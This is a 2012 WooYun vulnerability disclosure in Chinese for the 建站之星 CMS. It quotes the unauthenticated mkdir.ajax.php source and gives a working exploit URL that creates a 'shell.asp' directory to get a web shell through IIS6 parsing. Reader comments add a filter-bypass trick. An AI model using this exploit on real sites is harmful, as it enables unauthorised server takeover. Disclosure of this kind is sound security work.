当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08973

漏洞标题:建站之星全版本后台通杀getshell

相关厂商:建站之星

漏洞作者: Drift

提交时间:2012-06-29 10:10

修复时间:2012-06-29 10:10

公开时间:2012-06-29 10:10

漏洞类型:地下0day/成功的入侵事件

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

建站之星目前全版本后台拿shell漏洞

详细说明:

然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,
反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后 才会去掉。于是果断查看源码看函数:


function addSort(obj) {
 	$(obj).parent().find(‘span’).css(‘display’,'inline-block’);
 	$(obj).css(‘display’,'none’);
 	$(obj).parent().find(‘span > input:first’).focus();
 	}
 	 
 	function newDir(obj) {
 	var pth = $(obj).prev().attr(‘value’);
 	var basepth = $(‘#gtcurdir option:selected’).text();
 	if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的PTH变量进行了判断,(“/^\s+|\s+$/g,”),思路是 判断如果文本框内不算以上字符 长度等于0则继续执行.
 	alert(“请输入字符”);
 	$(obj).prev().focus();
 	return false;
 	} else {
 	$.ajax({
 	type : “GET”,
 	dataType : “text”,
 	url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。
 	success : function(response) {
 	switch (response) {
 	case ’0′:
 	$(obj).prev().val(”);
 	$(obj).parent().css(‘display’,'none’);
 	$(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);
 	$(‘<option value=”‘+basepth+pth+’/” selected=”true”>’+basepth+pth+’/</option>’).appendTo(‘#gtcurdir’);
 	break;
 	case ‘-1′:
 	alert(“文件夹已存在!”);
 	$(obj).prev().focus();
 	break;
 	case ‘-2′:
 	alert(“新建文件夹失败!”);
 	break;
 	}
 	},
 	error : function(response) {
 	alert(“请求失败!”);
 	return false;
 	}
 	});
 	}


看完函数 发现有一个很有意思的地方:

url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,


这里直接post出去命令。那么我们可否构造呢
于是查看了这个脚本的源码:

<?php//!!!竟然没有验证
header(‘Conten-type:text/html; charset=UTF-8′);
define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));
$adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));
define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));
$err = ’0′;
$basedir = trim($_GET['basedir']);//这里直接GET来自前面那个urlpost来的变量
$newdir = trim($_GET['newdir']);
// is or not exist dir
$hd = dir(“../../”.$basedir);
while(($path = $hd->read()) !== false) {
if ($path == $newdir) {
$err = ‘-1′;
break;
} else continue;
}
if ($err != ‘-1′) {
if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;
}
echo $err;
?>


程序员果然天然呆,不验证登陆,这里不验证文件名,任凭urlpost任意信息。
到这里知道了程序漏洞所在。附上exp:

http://localhost/admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp


返回0则表示成功。

漏洞证明:

<img src="


http://localhost/admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp

修复方案:

对mkdir.ajax.php加验证

版权声明:转载请注明来源 Drift@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)

漏洞评价:

评论

  1. 2012-06-29 12:38 | Spy4man ( 路人 | Rank:0 漏洞数:1 | 职业运维师..)

    很详细!感谢分享!

  2. 2012-07-19 16:20 | 撸管骚年 ( 路人 | Rank:12 漏洞数:4 | 可以不填吗?)

    撸上去的是文件夹吧

  3. 2012-09-12 15:59 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    我有一个站就是建站之星的,没升级到2.3,果断自己给那个文件加了include,伤不起。

  4. 2012-09-12 16:19 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    后来又看了一下,虽然include_once('../load.php');不能直接从外部提交了,但是,依然能创建带.的文件夹。不过万网的空间是IIS7的,到不存在解析漏洞,但是有的IIS6用户就惨了,官方2.3版本也未添加判断,自己添加吧。

  5. 2012-12-25 13:20 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    骚年,何必这么麻烦呢。我会告诉你用右键粘贴一个点就直接过掉了吗。